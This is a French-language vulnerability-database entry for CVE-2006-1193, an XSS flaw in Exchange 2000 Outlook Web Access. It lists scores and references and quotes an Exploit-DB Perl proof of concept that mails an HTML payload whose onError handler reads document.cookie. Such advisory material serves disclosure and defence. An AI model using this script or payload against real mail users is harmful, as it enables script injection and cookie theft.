CVE-2006-1193 : Détail

CVE-2006-1193

Cross-site Scripting
A03-Injection
86.21%V3
Network
2006-06-13
17h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 28005

Date de publication : 2006-06-12 22h00 +00:00
Auteur : Daniel Fabian
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/18381/info Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability. A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user. #!/usr/bin/perl use Net::SMTP; my $to = "recipient\@domain.tld"; my $sub = "Watch out - Cross Site Scripting Attack"; my $from = "originator\@domain2.tld"; my $smtp = "mail.example.tld"; my $cont = "<img alt='hugo\0abc' src='http://www.example.com/ imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)' alt='<s'\0"; $smtp = Net::SMTP->new($smtp); $smtp->mail("$from") || die("error 1"); $smtp->to("$to") || die("error 2"); $smtp->data() ; $smtp->datasend("To: $to\n") ; $smtp->datasend("From: $from\n") ; $smtp->datasend("Subject: $sub\n"); $smtp->datasend("Content-Type: text/html\n\n"); $smtp->datasend("$cont") ; $smtp->datasend("\n\n") ; $smtp->dataend() ; $smtp->quit() ; print "$cont\n\ndone\n";

Products Mentioned

Configuraton 0

Microsoft>>Exchange_server >> Version 2000

Microsoft>>Exchange_server >> Version 2000

Microsoft>>Exchange_server >> Version 2000

Références

http://securitytracker.com/id?1016280
Tags : vdb-entry, x_refsource_SECTRACK
http://www.osvdb.org/26441
Tags : vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/18381
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/2326
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/138188
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/20634
Tags : third-party-advisory, x_refsource_SECUNIA